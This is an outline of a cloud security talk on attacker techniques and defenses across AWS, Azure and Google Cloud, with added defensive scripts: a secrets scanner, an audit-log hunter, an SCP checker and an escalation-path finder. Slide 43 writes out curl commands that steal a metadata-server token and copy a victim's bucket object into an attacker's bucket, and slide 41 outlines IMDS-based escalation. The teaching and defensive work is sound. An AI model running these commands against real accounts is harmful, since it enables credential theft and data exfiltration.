  • Compromised Credential Detection: cloud threat detection
  • Workload Identity Federation: OpenID Connect identity provider
• 22. Breaking The Kill Chain: Version Control Secrets Scanning. Perform incremental and continuous secrets scanning.
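A minimal scanner for the credential locations of slides 17 and 18 and the secrets-scanning control on slide 22, as an added example rather than the talk's tooling. It matches AWS access key IDs (AKIA = long-lived IAM user key, ASIA = temporary STS key), AWS secret keys in config files, Google service account JSON keys, PEM private keys and Azure client secrets in env files, and reports file, line, kind and a masked preview. `SAMPLE_REPO` is a constructed in-memory tree: the AKIA key is AWS's documented example key, the ASIA key is the one shown on slide 19, and nothing in it is a live credential. Whether a hit is still valid, and whether it is a root access key, needs a live STS GetCallerIdentity call, which is out of scope here.

```python
"""Scan a code tree for credential material (version-control secrets scanning).

Added example, not the talk's tooling. SAMPLE_REPO is a constructed in-memory
tree; the keys in it are AWS's documented example key and the temporary key
shown on slide 19, not live credentials.
"""
import re
from pathlib import Path

PATTERNS = [
    ("aws-access-key-long-lived", re.compile(r"\b(AKIA[A-Z0-9]{16})\b")),
    ("aws-access-key-temporary", re.compile(r"\b(ASIA[A-Z0-9]{16})\b")),
    ("aws-secret-access-key",
     re.compile(r"(?i)aws_secret_access_key\s*[=:]\s*([A-Za-z0-9/+=]{40})")),
    ("gcp-service-account-key", re.compile(r'"type"\s*:\s*"(service_account)"')),
    ("private-key-pem", re.compile(r"(-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----)")),
    ("azure-client-secret", re.compile(r"(?i)\b(?:AZURE|ARM)_CLIENT_SECRET\s*=\s*(\S+)")),
]


def _mask(secret: str) -> str:
    """Show enough to locate the finding without copying the secret into the report."""
    return secret[:6] + "..." if len(secret) > 6 else "..."


def scan_text(path: str, text: str) -> list:
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS:
            for match in pattern.finditer(line):
                findings.append({"file": path, "line": lineno, "kind": kind,
                                 "preview": _mask(match.group(1))})
    return findings


def scan_repo(files: dict) -> list:
    """files maps relative path -> content; findings come back ordered by path, then line."""
    findings = []
    for path in sorted(files):
        findings.extend(scan_text(path, files[path]))
    return findings


def scan_directory(root: str) -> list:
    """Same scan over a real tree; skips .git and reads binaries with errors ignored."""
    files = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and ".git" not in p.parts:
            files[str(p.relative_to(root))] = p.read_text(errors="ignore")
    return scan_repo(files)


# Constructed sample tree (not real credentials).
SAMPLE_REPO = {
    "home/.aws/credentials": (
        "[default]\n"
        "aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
        "aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    ),
    "ci/deploy.env": (
        "AWS_ACCESS_KEY_ID=ASIA54BL6EJRTTJ4SS7A\n"
        "ARM_CLIENT_SECRET=not-a-real-secret-value\n"
    ),
    "gcp/sa.json": (
        '{\n  "type": "service_account",\n'
        '  "private_key": "-----BEGIN PRIVATE KEY-----\\nMIIE...",\n'
        '  "client_email": "deploy@example-project.iam.gserviceaccount.com"\n}\n'
    ),
    "README.md": "Run `aws sts get-caller-identity` to confirm which identity you are using.\n",
}

if __name__ == "__main__":
    for finding in scan_repo(SAMPLE_REPO):
        print(f'{finding["file"]}:{finding["line"]} {finding["kind"]} {finding["preview"]}')
```

Run `scan_directory(".")` as a pre-commit hook and again over the full history (every commit, not just HEAD) for the incremental and continuous scanning the slide calls for; a key that was committed and later removed is still in the repository and still valid until it is rotated.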
• 23. Breaking The Kill Chain: Cloud Threat Detection. Cloud-native threat detection has limited coverage for the use of stolen credentials. AWS GuardDuty finding types:
  • *:IAMUser/AnomalousBehavior
  • UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS
  • UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS
• 24. Breaking The Kill Chain: Cloud Threat Hunting. Threat hunting will have to fill the gaps. Google Cloud Logging entry: why is a Cloud Function service account accessing secrets from an external IP address?

    protoPayload: {
      @type: "type.googleapis.com/google.cloud.audit.AuditLog"
      authenticationInfo: {
        principalEmail: "cheetah-354157@appspot.gserviceaccount.com"
        principalSubject: "user:sec510-354157@appspot.gserviceaccount.com"
      }
      …
      methodName: "google.cloud.secrets.v1beta1.SecretManagerService.AccessSecretVersion"
      resourceName: "projects/123456789012/secrets/cheetah-database-pass/versions/latest"
      serviceName: "secretmanager.googleapis.com"
      requestMetadata: {
        callerIp: "95.025.143.109"
        callerSuppliedUserAgent: "curl/7.64.1,gzip(gfe),gzip(gfe)"
        …
      }
    }
    …
    timestamp: "2023-01-10T20:30:00.192825193Z"
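The hunt behind that log entry, written out as an added example that is not part of the talk: a workload's service account should only call sensitive APIs from the project's own egress addresses, so flag watched methods called by a `*.gserviceaccount.com` principal from any other IP, and note when the user agent is not a Google client library or gcloud. `SAMPLE_LOG_LINES` are constructed entries in the shape of a Cloud Logging AuditLog export (the external address is a TEST-NET value, not the one on the slide), `TRUSTED_EGRESS` is a made-up allowlist standing in for the organisation's Cloud NAT / VPN ranges, and `EXPECTED_UA_PREFIXES` is an assumed list of client user agents.

```python
"""Hunt Google Cloud audit logs for workload identities used from outside the cloud.

Added example, not part of the talk. SAMPLE_LOG_LINES are constructed JSON
entries in the shape of Cloud Logging's AuditLog export; TRUSTED_EGRESS is a
made-up allowlist standing in for the organisation's Cloud NAT / VPN ranges.
"""
import ipaddress
import json

TRUSTED_EGRESS = [ipaddress.ip_network(c) for c in ("203.0.113.0/24", "2001:db8:1::/48")]
# Methods that hand out secrets or keys; extend with your own high-value calls.
WATCHED_METHODS = {
    "google.cloud.secrets.v1beta1.SecretManagerService.AccessSecretVersion",
    "google.cloud.secretmanager.v1.SecretManagerService.AccessSecretVersion",
    "google.iam.admin.v1.CreateServiceAccountKey",
}
# Assumed prefixes of the official client libraries and gcloud; anything else is a signal.
EXPECTED_UA_PREFIXES = ("google-api-", "google-cloud-", "gcloud/", "grpc-", "Google-API-")


def _is_workload_identity(principal: str) -> bool:
    return principal.endswith(".gserviceaccount.com")


def _ip_is_trusted(caller_ip: str):
    """True/False for IP callers; None when callerIp is not an IP (redacted or a non-IP marker)."""
    try:
        addr = ipaddress.ip_address(caller_ip)
    except ValueError:
        return None
    return any(addr in net for net in TRUSTED_EGRESS)


def hunt(log_lines) -> list:
    """Return one finding per watched call made by a service account from outside TRUSTED_EGRESS."""
    findings = []
    for line in log_lines:
        entry = json.loads(line)
        payload = entry.get("protoPayload", {})
        principal = payload.get("authenticationInfo", {}).get("principalEmail", "")
        method = payload.get("methodName", "")
        meta = payload.get("requestMetadata", {})
        caller_ip = meta.get("callerIp", "")
        if not _is_workload_identity(principal) or method not in WATCHED_METHODS:
            continue
        if _ip_is_trusted(caller_ip) is not False:
            continue  # trusted egress, or not an IP we can judge
        user_agent = meta.get("callerSuppliedUserAgent", "")
        findings.append({
            "timestamp": entry.get("timestamp"),
            "principal": principal,
            "method": method,
            "resource": payload.get("resourceName"),
            "caller_ip": caller_ip,
            "unexpected_user_agent": not user_agent.startswith(EXPECTED_UA_PREFIXES),
        })
    return findings


def _entry(ts, principal, method, resource, ip, user_agent) -> str:
    """Build one constructed log line in AuditLog export shape."""
    return json.dumps({
        "protoPayload": {
            "@type": "type.googleapis.com/google.cloud.audit.AuditLog",
            "authenticationInfo": {"principalEmail": principal},
            "methodName": method,
            "resourceName": resource,
            "serviceName": "secretmanager.googleapis.com",
            "requestMetadata": {"callerIp": ip, "callerSuppliedUserAgent": user_agent},
        },
        "timestamp": ts,
    })


ACCESS = "google.cloud.secrets.v1beta1.SecretManagerService.AccessSecretVersion"
SECRET = "projects/123456789012/secrets/cheetah-database-pass/versions/latest"
WORKLOAD_SA = "cheetah-354157@appspot.gserviceaccount.com"
SAMPLE_LOG_LINES = [
    # expected: the function reading its own secret from the project's NAT address
    _entry("2023-01-10T20:29:10Z", WORKLOAD_SA, ACCESS, SECRET,
           "203.0.113.10", "google-api-go-client/0.5 gl-go/1.19"),
    # the slide's pattern: same service account, external address, curl
    _entry("2023-01-10T20:30:00Z", WORKLOAD_SA, ACCESS, SECRET,
           "198.51.100.77", "curl/7.64.1,gzip(gfe),gzip(gfe)"),
    # a human using gcloud from outside is not a workload identity; not this hunt's job
    _entry("2023-01-10T20:31:42Z", "dev@example.com", ACCESS, SECRET,
           "198.51.100.78", "google-cloud-sdk gcloud/412.0.0"),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG_LINES):
        print(finding)
```

The same shape works as a scheduled query against a BigQuery log sink: filter on `protoPayload.authenticationInfo.principalEmail LIKE '%gserviceaccount.com'` and the watched `methodName`, then exclude your egress ranges; the code above is the portable version for a SIEM that ingests the JSON export.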
• 25. Breaking The Kill Chain: Workload Identity Federation. Protip: long-lived credentials must die!
• 27. Network Service Discovery: MITRE ATT&CK T1046 covers enumerating resources with public IP addresses in the victim's cloud account:
  • VPC-bound resource types include virtual machines, load balancers, containers, datastores, Redis clusters, and data lakes
  • Public cloud IP address blocks are well known
  • Large-scale cloud network service discovery (e.g., Shodan, Nmap)
    → Cloud Scanning For Vulnerability Discovery by @joswr1ght: https://sec510.com/1042
  • Identify remotely exploitable hosts and software
• 28. AWS Default Virtual Machine Security Group: EC2 instances created in the AWS web console auto-generate a new security group with open administrative access by default:
  • Linux VMs auto-populate open SSH access
  • Windows VMs auto-populate open RDP access
• 29. Azure Default Virtual Machine Network Access: Azure Virtual Machines created in the UI default to open administrative access:
  • Linux VMs auto-populate open SSH access
  • Windows VMs auto-populate open RDP access
• 30. GCP Default Network Firewall Rules: the default VPC contains pre-populated firewall rules allowing wide-open administrative access.
• 31. Misconfigured GCP Firewall Rules: Shodan search for virtual machines on Google Compute Engine exposing SSH and RDP ports.
• 32. Breaking The Kill Chain: MITRE ATT&CK T1046. Defending against network service discovery requires organizations to build more advanced network architectures:
  • AWS: Shared VPC & Transit Gateway
  • Azure: Virtual WAN
  • Google Cloud: Shared VPC, Cloud Routing, Peering, VPN
• 33. Breaking The Kill Chain: VPC Sharing. Centralize VPC resources into a single network host account (or project) in the resource hierarchy:
  • VPC networks & subnets
  • Internet & NAT gateways
  • Public IP addresses
  • Route tables
  • Firewall rules
    → NACLs
    → Security Groups
  • VPC Endpoints
• 34. Breaking The Kill Chain: Restricting Public Network Connectivity. Preventing unauthorized public network access: actions that create public connectivity are denied, except for the network host account.

    {
      "Sid": "RestrictPublicConnectivityToInfrastructureAccounts",
      "Effect": "Deny",
      "Action": [
        "ec2:AllocateAddress",
        "ec2:AttachInternetGateway",
        "ec2:CreateInternetGateway",
        "ec2:CreateEgressOnlyInternetGateway",
        "ec2:CreateVpcPeeringConnection",
        "ec2:AcceptVpcPeeringConnection",
        "globalaccelerator:Create*",
        "globalaccelerator:Update*"
      ],
      "Resource": "*",
      "Condition": {
        "StringNotEquals": {
          "aws:PrincipalAccount": [
            "123456789012"
          ]
          …
    }
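Before attaching an SCP, check what it actually blocks. The block below is an added example, not the talk's tooling: it applies the SCP Deny rule the way AWS evaluates it (Action, Resource and Condition must all match, and an explicit Deny is never overridden by an Allow) to the two guardrails on slide 13 and the network guardrail on slide 34. The policy constants are my transcription of those slides with the truncated closing braces completed; the Lambda Resource is written as `arn:aws:lambda:*:*:function:*` because Lambda function ARNs separate `function` from the name with a colon. Only StringEquals and StringNotEquals are implemented, and the account IDs and function names in the test requests are made up.

```python
"""Check what an SCP Deny statement actually blocks before attaching it.

Added example, not the talk's own tooling. The policy constants transcribe
slides 13 and 34 with their truncated closing braces completed; account IDs
and function names in the requests are made up.
"""
import fnmatch


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _glob_match(patterns, value: str) -> bool:
    """IAM '*' and '?' wildcards, compared case-insensitively (exact for actions,
    and close enough for the lower-case ARNs used here)."""
    value = value.lower()
    return any(fnmatch.fnmatchcase(value, p.lower()) for p in _as_list(patterns))


def _condition_holds(condition: dict, context: dict) -> bool:
    for operator, pairs in condition.items():
        for key, expected in pairs.items():
            expected = [str(v) for v in _as_list(expected)]
            actual = context.get(key)
            if operator == "StringEquals":
                if actual not in expected:
                    return False
            elif operator == "StringNotEquals":
                # Negated operators hold when the key is absent from the request,
                # which is why keys the API always supplies (lambda:FunctionUrlAuthType,
                # aws:PrincipalAccount) make safe SCP conditions.
                if actual is not None and actual in expected:
                    return False
            else:
                raise NotImplementedError(f"operator {operator} not supported here")
    return True


def scp_denies(policy: dict, action: str, resource: str, context: dict) -> bool:
    """True when any Deny statement matches the request. Allow statements are
    ignored: an SCP only bounds what the account may do, it never grants."""
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Deny":
            continue
        if not _glob_match(stmt.get("Action", []), action):
            continue
        if not _glob_match(stmt.get("Resource", []), resource):
            continue
        if not _condition_holds(stmt.get("Condition", {}), context):
            continue
        return True
    return False


S3_PUBLIC_ACCESS_BLOCK_SCP = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Deny", "Action": ["s3:PutAccountPublicAccessBlock"], "Resource": "*"}],
}

LAMBDA_URL_SCP = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Deny",
        "Action": ["lambda:CreateFunctionUrlConfig", "lambda:UpdateFunctionUrlConfig"],
        "Resource": "arn:aws:lambda:*:*:function:*",
        "Condition": {"StringNotEquals": {"lambda:FunctionUrlAuthType": "AWS_IAM"}},
    }],
}

NETWORK_HOST_ACCOUNT = "123456789012"
PUBLIC_CONNECTIVITY_SCP = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "RestrictPublicConnectivityToInfrastructureAccounts",
        "Effect": "Deny",
        "Action": [
            "ec2:AllocateAddress", "ec2:AttachInternetGateway", "ec2:CreateInternetGateway",
            "ec2:CreateEgressOnlyInternetGateway", "ec2:CreateVpcPeeringConnection",
            "ec2:AcceptVpcPeeringConnection", "globalaccelerator:Create*", "globalaccelerator:Update*",
        ],
        "Resource": "*",
        "Condition": {"StringNotEquals": {"aws:PrincipalAccount": [NETWORK_HOST_ACCOUNT]}},
    }],
}

if __name__ == "__main__":
    fn = "arn:aws:lambda:us-east-1:444455556666:function:api"
    print(scp_denies(LAMBDA_URL_SCP, "lambda:CreateFunctionUrlConfig", fn,
                     {"lambda:FunctionUrlAuthType": "NONE"}))         # True: public URL blocked
    print(scp_denies(PUBLIC_CONNECTIVITY_SCP, "ec2:CreateInternetGateway", "*",
                     {"aws:PrincipalAccount": NETWORK_HOST_ACCOUNT}))   # False: host account may
```

Two things the evaluator makes visible that are easy to miss when reading JSON: `lambda:DeleteFunctionUrlConfig` is not in the action list, so the guardrail does not prevent removing a URL (fine, that is the safe direction), and the network SCP keys off `aws:PrincipalAccount`, so a role in the host account that is assumed from elsewhere is still allowed; pair it with a tight trust policy on the host account's roles.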
• 35. Breaking The Kill Chain: Centralized Resource Configurations. Centralizing network resources into the network host account provides a single pane of glass for public connectivity: a public inventory.
• 36. Breaking The Kill Chain: Centralized Inbound, Outbound, and Traffic Inspection
  • 37. T1537: Transfer Data to Cloud Account
• 38. Transfer Data to the Attacker's Cloud Account: MITRE ATT&CK T1537 covers exfiltrating data from the victim's cloud account by escalating privileges and transferring data over the cloud provider's backbone network to avoid network-based detection:
  • Compromising over-permissioned service accounts
  • Impersonating a target service account
  • Transferring data across the cloud provider's backbone network
  • Pivoting with stolen credentials
• 39. Privilege Escalation: Azure Overly Scoped Role Definition. Example role definition allowing excessive permissions and overly scoped access to resources (subscription-wide scope to all storage accounts):

    {
      "assignableScopes": [
        "/subscriptions/${var.subscription_id}"
      ],
      "permissions": [
        {
          "actions": [
            "Microsoft.Storage/storageAccounts/listKeys/action",
            "Microsoft.Storage/storageAccounts/ListAccountSas/action",
            "Microsoft.Storage/storageAccounts/read"
          ]
        }
      ],
      "roleName": "Storage Access"
    }
• 40. Privilege Escalation: Google Cloud's Primitive Editor Role. The Editor role (a primitive role, now called a basic role) has permission to view, modify, and delete existing project resources (with a few exceptions):
  • Default role assigned to Compute instances, App Engine services, and Cloud Functions
  • Too permissive for what your workload needs in production
  • Has over 4,000 assigned permissions on the project
  • Attackers compromising workloads with Editor permissions can access data across the project
• 41. Privilege Escalation: Transitive Permission Assignment. Transitive privilege escalation occurs by creating a resource that inherits permissions from a supplied service account:
  • AWS: iam:PassRole permission
  • GCP: iam.serviceAccounts.actAs permission
  Steps: create a compute instance → configure it to run as the target service account → obtain a token through the Instance Metadata Service (IMDS) → impersonate the privileged service account in the project
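An added example for the path above, not from the talk: given role bindings and the permissions each role carries, it lists every principal that holds both halves of the transitive escalation (create a compute workload plus pass/actAs a service account), which is the review an IAM owner should run before the attacker does. `ROLES` holds constructed, partial permission lists standing in for the real definitions: `roles/editor` really does carry both `compute.instances.create` and `iam.serviceAccounts.actAs`, but none of the lists here is complete. Principals, policy names and account IDs are made up.

```python
"""Find principals that can escalate by creating a workload bound to a stronger identity.

Added example, not from the talk. ROLES holds constructed, partial permission
lists that stand in for the real role definitions; principals, policy names
and account IDs are made up.
"""
import fnmatch

# (permissions that must all be held, how the attacker uses them)
ESCALATION_PATHS = {
    "gcp": ({"compute.instances.create", "iam.serviceAccounts.actAs"},
            "create a GCE instance running as the target service account and read "
            "its token from the metadata server"),
    "aws": ({"ec2:RunInstances", "iam:PassRole"},
            "launch an EC2 instance with the target role's instance profile and read "
            "its credentials from IMDS"),
}

ROLES = {
    "roles/viewer": {"compute.instances.get", "compute.instances.list", "storage.objects.get"},
    "roles/compute.instanceAdmin.v1": {"compute.instances.create", "compute.instances.delete",
                                       "compute.instances.get"},
    "roles/iam.serviceAccountUser": {"iam.serviceAccounts.actAs", "iam.serviceAccounts.get"},
    "roles/editor": {"compute.instances.create", "iam.serviceAccounts.actAs",
                     "storage.objects.get", "storage.objects.create"},
    "CiDeployPolicy": {"ec2:RunInstances", "ec2:Describe*", "iam:PassRole"},
    "ReadOnlyAccess": {"ec2:Describe*", "s3:Get*", "s3:List*"},
}

BINDINGS = [
    ("user:dev@example.com", "roles/compute.instanceAdmin.v1"),
    ("user:dev@example.com", "roles/iam.serviceAccountUser"),
    ("user:analyst@example.com", "roles/viewer"),
    ("serviceAccount:123456789012-compute@developer.gserviceaccount.com", "roles/editor"),
    ("arn:aws:iam::111122223333:user/ci", "CiDeployPolicy"),
    ("arn:aws:iam::111122223333:user/auditor", "ReadOnlyAccess"),
]


def expand_permissions(bindings, roles) -> dict:
    """principal -> union of the permissions of every role bound to it."""
    perms = {}
    for principal, role in bindings:
        perms.setdefault(principal, set()).update(roles[role])
    return perms


def _holds(perms, needed: str) -> bool:
    """Wildcard grants such as ec2:* or iam:Pass* count as holding the permission."""
    return any(fnmatch.fnmatchcase(needed.lower(), p.lower()) for p in perms)


def find_escalation_paths(bindings, roles) -> list:
    findings = []
    for principal, perms in sorted(expand_permissions(bindings, roles).items()):
        for cloud, (required, how) in ESCALATION_PATHS.items():
            if all(_holds(perms, p) for p in required):
                findings.append({"principal": principal, "cloud": cloud, "via": how})
    return findings


if __name__ == "__main__":
    for path in find_escalation_paths(BINDINGS, ROLES):
        print(f'{path["cloud"]}: {path["principal"]} can {path["via"]}')
```

The two combinations are the ones to break: on AWS, constrain `iam:PassRole` to the specific role ARNs a pipeline needs and add an `iam:PassedToService` condition of `ec2.amazonaws.com`; on GCP, grant `roles/iam.serviceAccountUser` on the individual service account rather than at project level, and replace the default compute service account's Editor binding with a purpose-built role.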
• 42. Data Exfiltration: Transferring Data Cross-Tenant. Attackers leverage private service access (private link) to exfiltrate data across the cloud provider's backbone network:
  • Private link services are designed to help customers keep data from traversing the Internet
  • The default endpoint policy (AWS, GCP) allows multi-tenant access to the cloud provider APIs
  • May allow data to move cross-tenant between resources without network and firewall inspection
• 43. Data Exfiltration: Stolen Credential Pivoting. Exfiltrating data from the victim's Google Cloud project using the stolen credential:

    # Obtain an access token for the instance's attached service account from the metadata server
    export BEARER_TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
      "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" | jq -r .access_token)

    # List all storage buckets in the victim's project
    curl -s -H "Authorization: Bearer $BEARER_TOKEN" \
      "https://storage.googleapis.com/storage/v1/b?project=victims-project"

    # Copy objects from the victim's bucket into the attacker's bucket (server-side, over Google's network)
    curl -s -X POST -H "Authorization: Bearer $BEARER_TOKEN" \
      "https://storage.googleapis.com/storage/v1/b/victims-bucket/o/data.pdf/copyTo/b/attackers-bucket/o/data.pdf"
• 44. Breaking The Kill Chain: MITRE ATT&CK T1537. Defending against privilege escalation and data exfiltration requires additional cloud-native controls to prevent data from leaving the organization's tenant:
  • AWS / GCP: IAM Access Analyzer, IAM Recommender
  • AWS / Azure: Private Link services, network access rules
  • Google Cloud: VPC Service Controls
• 45. Breaking The Kill Chain: IAM Recommender. Reviewing IAM Recommender reports and reducing excessive permissions.
• 46. Breaking The Kill Chain: Service Endpoint Configuration. Preventing data exfiltration with private link services and network access policy.
• 47. Breaking The Kill Chain: VPC Service Controls. Configuring a VPC Service Controls perimeter to prevent data exfiltration:
  • The perimeter includes the authorized projects
  • In-scope services include the GCS storage service
  • Unauthorized projects and external clients cannot interact with the target GCS bucket
• 49. Closing Remarks: breaking the cloud kill chain requires an in-depth understanding of cloud-native services and configurations:
  • Resources can be made public too easily: build guardrails with the policy hierarchy
  • Credential management continues to be a problem: move to workload identity federation
  • Cloud resources are Internet-exposed too easily: central network inspection is critical
  • New ways to hide and exfiltrate data exist: focus on building network and identity perimeters
• 52. Thank you for attending! Questions?